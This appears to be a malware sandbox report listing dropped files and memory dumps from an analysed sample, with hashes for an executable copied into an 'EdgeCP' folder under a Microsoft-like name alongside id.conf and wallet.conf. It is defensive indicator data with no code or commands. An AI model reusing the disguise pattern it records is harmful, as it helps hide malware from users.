67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
f93980e0b7767e289bbf2dac2c07dbfa

SHA1
1d375f68635abe3e0b88ee39f904ec18d7a96ca0

SHA256
9f4395cd8b9484aa98b6e36e839a0d4a11e9159c8e6329ddf0a6af4d1eb34eb4

SHA512
73046bb29bb42cd5d34dbcbddfbdb893c236f067cf854c0da2e05e1218cbe7739c7d10a76a31fbd887a91ce4053df2e5733875c6bac63b0c8adc6c5e5bf95a9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
b0c4db2e327b48808dc40d7f52492ac4

SHA1
9cee67c4749f2f8c84ae1686c486114bf7865035

SHA256
e62c6dc6d4701aa4cdb32ff5fc4a998e46cd93e2f7d62eff53d70c660e7ea09b

SHA512
6092052c1d7dae4668cc9e58dfef31ef287cea05c4708a34b7f292495e4f27937dfd69aa3b819b0c5e40f9b3fb20b414dd80c4caee5f5fc34218f3416f26312e

Download Submit
C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\id.conf
MD5
bbc740daa580a1dfac2ff712596a2ed7

SHA1
c175e73049513f2411e7171661254ece26ed87bd

SHA256
d9f782dc1ec18133e96307c02ed70268bf7dc61c99acfec4722e96f7089ab141

SHA512
475b11dd5dab095dc362c56328d3aa433f520a6b2b5df328505ab8752e638897a880022308b0e84f75b94eeb1492c68e8a9d4ca539f2c00779b572b3e54e84cc

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.conf
MD5
69bf7238c8e32793411515d8ca5926a9

SHA1
d6918bcceab927a036b760a82cadd340d83b8ed1

SHA256
57df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66

SHA512
4a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3

Download Submit
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
memory/332-97-0x0000000000000000-mapping.dmp

Download
memory/432-155-0x0000000000000000-mapping.dmp

Download
memory/472-168-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/472-172-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/472-169-0x0000000000413E10-mapping.dmp

Download
memory/536-154-0x0000000000000000-mapping.dmp

Download
memory/772-72-0x00000000765F1000-0x00000000765F3000-memory.dmp

Filesize
8KB

Download
memory/772-73-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/772-70-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/772-71-0x00000000007E2730-mapping.dmp

Download
memory/828-78-0x0000000000000000-mapping.dmp

Download
memory/828-195-0x0000000000000000-mapping.dmp

Download
memory/844-84-0x0000000000000000-mapping.dmp

Download
memory/1132-160-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/1132-157-0x00000000004466F4-mapping.dmp

Download
memory/1132-156-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/1148-104-0x0000000000000000-mapping.dmp

Download
memory/1160-196-0x0000000000000000-mapping.dmp

Download
memory/1188-118-0x00000000061C0000-0x00000000061C1000-memory.dmp

Filesize
4KB

Download
memory/1188-148-0x0000000006300000-0x0000000006301000-memory.dmp

Filesize
4KB

Download
memory/1188-101-0x0000000002480000-0x00000000030CA000-memory.dmp

Filesize
12.3MB

Download
memory/1188-125-0x0000000006280000-0x0000000006281000-memory.dmp

Filesize
4KB

Download
memory/1188-105-0x0000000002850000-0x0000000002851000-memory.dmp

Filesize
4KB

Download
memory/1188-110-0x0000000006040000-0x0000000006041000-memory.dmp

Filesize
4KB

Download
memory/1188-88-0x0000000000000000-mapping.dmp

Download
memory/1188-112-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1188-132-0x0000000005610000-0x0000000005611000-memory.dmp

Filesize
4KB

Download
memory/1188-100-0x0000000002480000-0x00000000030CA000-memory.dmp

Filesize
12.3MB

Download
memory/1188-149-0x0000000006310000-0x0000000006311000-memory.dmp

Filesize
4KB

Download
memory/1188-116-0x00000000060E0000-0x00000000060E1000-memory.dmp

Filesize
4KB

Download
memory/1276-166-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1276-161-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1276-162-0x0000000000401074-mapping.dmp

Download
memory/1316-191-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1316-186-0x0000000000401000-mapping.dmp

Download
memory/1336-189-0x0000000000000000-mapping.dmp

Download
memory/1344-192-0x0000000000000000-mapping.dmp

Download
memory/1360-117-0x0000000000000000-mapping.dmp

Download
memory/1360-194-0x0000000000000000-mapping.dmp

Download
memory/1588-98-0x0000000004790000-0x0000000004791000-memory.dmp

Filesize
4KB

Download
memory/1588-92-0x00000000047D0000-0x00000000047D1000-memory.dmp

Filesize
4KB

Download
memory/1588-102-0x0000000002490000-0x0000000002491000-memory.dmp

Filesize
4KB

Download
memory/1588-99-0x0000000004792000-0x0000000004793000-memory.dmp

Filesize
4KB

Download
memory/1588-153-0x0000000006040000-0x0000000006041000-memory.dmp

Filesize
4KB

Download
memory/1588-91-0x0000000000A00000-0x0000000000A01000-memory.dmp

Filesize
4KB

Download
memory/1588-167-0x00000000061B0000-0x00000000061B1000-memory.dmp

Filesize
4KB

Download
memory/1588-87-0x0000000000000000-mapping.dmp

Download
memory/1640-193-0x0000000000000000-mapping.dmp

Download
memory/1684-176-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/1684-174-0x000000000044412E-mapping.dmp

Download
memory/1684-107-0x0000000000000000-mapping.dmp

Download
memory/1684-173-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/1784-146-0x0000000000000000-mapping.dmp

Download
memory/1804-183-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1804-179-0x00000000004010B8-mapping.dmp

Download
memory/1948-184-0x0000000000401108-mapping.dmp

Download
memory/1948-190-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/1988-177-0x0000000000401000-mapping.dmp

Download
memory/1988-182-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2004-62-0x0000000000B20000-0x0000000000B21000-memory.dmp

Filesize
4KB

Download
memory/2004-63-0x0000000000B25000-0x0000000000B36000-memory.dmp

Filesize
68KB

Download
memory/2004-64-0x0000000005E00000-0x0000000005FA4000-memory.dmp

Filesize
1.6MB

Download
memory/2004-60-0x0000000000D60000-0x0000000000D61000-memory.dmp

Filesize
4KB

Download
memory/2004-69-0x0000000000550000-0x00000000005B5000-memory.dmp

Filesize
404KB

Download